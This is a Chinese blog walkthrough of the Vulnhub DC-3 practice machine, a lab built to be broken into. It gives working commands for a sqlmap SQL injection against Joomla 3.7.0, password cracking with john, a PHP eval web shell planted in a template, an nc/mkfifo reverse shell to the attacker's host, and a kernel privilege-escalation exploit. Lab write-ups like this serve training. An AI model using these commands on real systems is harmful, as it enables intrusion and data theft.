freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Vulnhub--DC-3
2022-12-20 18:11:06
所属地 宁夏

Vulnhub--DC-3

一,部署方法

  1. 在官网上下载zip压缩包
  2. 下载到本地上解压缩后使用虚拟机导入.ova后缀的文件(在过程中出现问题不用理睬,点击重试即可)
  3. 配置网络,本人设置的是nat模式,这个看个人需求
  4. 打开靶机即可

二,靶机地址和描述

1. 下载地址

https://download.vulnhub.com/dc/DC-3-2.zip

2. 靶机描述

1671530248_63a187083ae180f14a210.png!small?1671530248322

这次只有一个flag,一个入口点,没有任何线索!

三,测试

1. 信息收集

arp-scan -l

1671530262_63a18716da4a161d3ddf9.png!small?1671530262873

探测发现靶机的IP地址是:192.168.237.145

对靶机进行全面扫描

nmap -A -T4 -p- 192.168.237.145

1671530273_63a1872123b20e0948036.png!small?1671530273074

发现靶机开启了80端口,web服务,而且CMS站点是joomla的。

访问站点

1671530281_63a187291fc2911944518.png!small?1671530281116

使用dirsearch爆破网站目录

dirsearch -u http://192.168.237.145/

1671530294_63a18736d15d803dc526a.png!small?1671530294833

1671530301_63a1873d41dab624a5fe6.png!small?1671530301414

在其中发现后台登录入口

因为是joomla的站点,这里使用专门针对于joomla站点的漏扫工具进行漏洞发现

2. 漏洞发现

需要在kali上下载joomscan

【joomscan是对joomla项目的开源漏扫工具】

sudo apt-get install joomscan

1671530314_63a1874abbe934efaf295.png!small?1671530314966

使用命令

Joomscan -h

查看joomscan的使用方法

1671530331_63a1875b87176f79ffb73.png!small?1671530331754

Joomscan --url http://192.168.237.145

1671530342_63a187664c027769d6188.png!small?1671530342808

扫描出来的joomla版本是3.7.0

3.漏洞利用

使用

searchsploit joomla 3.7.0

查看joomla3.7.0的漏洞利用模块

1671530356_63a18774aa08c5c9ad545.png!small?1671530356624

发现SQL注入

查看joomla3.7.0的SQL注入的使用方法的文件

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

1671530372_63a18784a83cf2c8a2aeb.png!small?1671530372742

将””中的localhost切换为刚刚的网址

sqlmap-u"http://192.168.237.145/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

1671530393_63a187993495de3eadd30.png!small?1671530393137

1671530401_63a187a1476ac6cb0c9ab.png!small?1671530401364

爆破出来五个数据库,这里发现的joomladb应该就是joomla站点的数据库。

这里继续爆破joomladb数据库的表

sqlmap -u "http://192.168.237.145/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

1671530536_63a1882820712856351a2.png!small?1671530536097


1671530542_63a1882ea772812d74d12.png!small?1671530542555

1671530556_63a1883cf1dfc48e0eef5.png!small?1671530556931

这里爆出joomladb数据库下有76个表,其中有一个#_users的表,猜测用户名和密码在其中存放,继续爆破#_users中的字段

sqlmap -u "http://192.168.237.145/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" --columns -p list[fullordering]

1671530569_63a18849670dafac096cf.png!small?1671530569463

1671530574_63a1884e9d64eb9989da8.png!small?1671530574512

跑出来6个字段,这里继续爆破字段名称

sqlmap -u "http://192.168.237.145/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C "id,name,password,username" --dump -p list[fullordering]

1671530585_63a1885923f37386c3f34.png!small?1671530585106

1671530590_63a1885e1bfc37636c178.png!small?1671530589925

爆破出来用户名和密码

可见密码是经过加密以后的,这里使用kali中的john工具进行解密

首先复制密码,创建文件

vi pass.txt

cat pass.txt

1671530603_63a1886bc3e2551519d10.png!small?1671530603657

使用工具进行解密

John pass.txt

1671530610_63a1887298df9e324669b.png!small?1671530610581

解密出来密码是snoopy

这里使用用户名/密码:admin/snoopy,尝试登录在信息收集阶段和漏洞发现时期爆出来的后台登录页面,

1671530619_63a1887babf12360d9ccb.png!small?1671530620761

登录成功!

3. Getshell

查看全面功能点,寻找可插入代码的位置

终于找到可插入的位置,存在于Templates下

1671530625_63a188819f6eb7441dc52.png!small?1671530625748

1671530630_63a18886958586d5784df.png!small?1671530630819


点击进去

1671530636_63a1888c468e0965a3f88.png!small?1671530636196

点击error.php,写入一句话代码

<?php eval(@$_POST['hack']); ?>

访问页面

1671530646_63a18896837c4077a1a00.png!small?1671530646430

页面无显示,这里尝试使用蚁剑进行链接

1671530652_63a1889c8cc41014d68de.png!small?1671530652592

成功链接!!!

使用kali机器开启监听

nc -lvvp 4444

1671530664_63a188a800bc2644e7f00.png!small?1671530663799

然后打开蚁剑的虚拟终端

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.237.141 4444 >/tmp/f

1671530673_63a188b191c362e73d492.png!small?1671530673385

点击回车,发现监听成功

1671530677_63a188b5b76eca37c9e94.png!small?1671530677589

输入

python -c ‘import pty;pty.spawn(“/bin/bash”)’;

变为交互式shell,可以看到当前用户所在的目录

1671530687_63a188bf6cb7e27f1fdaa.png!small?1671530687294

输入

id

1671530690_63a188c2ddf219399eca4.png!small?1671530690780

发现全是低权限,需要提权

4. 提权

使用

cat /etc/issue

查看当前的操作系统信息

1671530700_63a188cc4628d2634593f.png!small?1671530700072

使用

searchsploit Ubuntu 16.04

查看有没有可用的本地漏洞

1671530713_63a188d9333115af8f281.png!small?1671530713212

只有这个可以用

使用

Find / -name “39772.txt”

搜索文件的位置

1671530722_63a188e206445e0f4223a.png!small?1671530721906

找到文件位置

使用

cat /usr/share/exploitdb/exploits/linux/local/39772.txt

1671530730_63a188eadfc8e22a7d477.png!small?1671530731029

1671530736_63a188f0c42474fa221d7.png!small?1671530736627

打开网页进行下载,发现提供的两个网页均无法正确打开,上网搜索过后,发现可以从这个网页进行下载

https://gitee.com/aaaddc/exploitdb-bin-sploits/blob/master/bin-sploits/39772.zip

首先将目录调整到/var/www/html下

使用

Wget Https://gitee.com/aaaddc/exploitdb-bin-sploits/blob/master/bin-sploits/39772.zip

1671530753_63a189013e9b83dba56ba.png!small?1671530753525

成功下载

输入

Ls

查看是否下载成功

1671530759_63a18907dd9c1dc6b122a.png!small?1671530759889

成功下载。

使用

Unzip 39772.zip

进行解压缩

【因为一些些的不可抗力的原因,zip无法解压缩。于是我们不妨迂回一下,就是有点点的小麻烦】

首先在物理机上下载下来,移动到kali攻击机上

使用

unzip exploitdb-bin-sploits-master.zip

ls

cd exploitdb-bin-sploits-master

Ls

Cd bin-sploits

Ls

1671530774_63a18916f1b8eef048174.png!small?1671530775291

这是一个合集,在其中寻找39772.zip进行解压缩,并且进入39772的目录,进行查看

Unzip 39772.zip

Cd 39772

Ls

1671530783_63a1891f0642ee76923dc.png!small?1671530783131

在使用蚁剑将39772目录内的文件上传到/var/www/html的目录上

1671530787_63a1892359c2dc470e6d6.png!small?1671530787358

【好啦。我们再继续进行我们的提权过程吧!!】

1671530793_63a189292c65fbd51036b.png!small?1671530793114

使用

Tar -xvf exploit.tar

1671530799_63a1892f2d3cf5070eb5f.png!small?1671530799589

解压出来ebpf_mapfd_doubleput_exploit的目录,进入ebpf_mapfd_doubleput_exploit目录,查看目录内容

cd ebpf_mapfd_doubleput_exploit

Ls

1671530808_63a189380ae360ae0ef1d.png!small?1671530807950

发现compile.sh

使用

./compile.sh

Ls

1671530815_63a1893fd9bfdead95dee.png!small?1671530816020

./doubleput

Whoami

1671530823_63a189474967b45230bc2.png!small?1671530823240

提权成功!!!!!!!

5. 找到最后的flag

使用

cd /root

Ls

Cat the-flag.txt

1671530831_63a1894fe7dcb5eeb6239.png!small?1671530836717

成功解题!!!

四,知识点总结

  1. nmap工具的使用
  2. dirsearch工具的使用
  3. Joomscan工具的使用【对joomla站点的漏扫工具】
  4. Sqlmap的使用
  5. John解密工具的使用
  6. 一句话木马和蚁剑的链接使用
  7. Kali的nc监听
  8. 根据内核系统版本的提权



# 渗透测试 # 网络安全技术 # VulnHub # vulnhub靶机
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录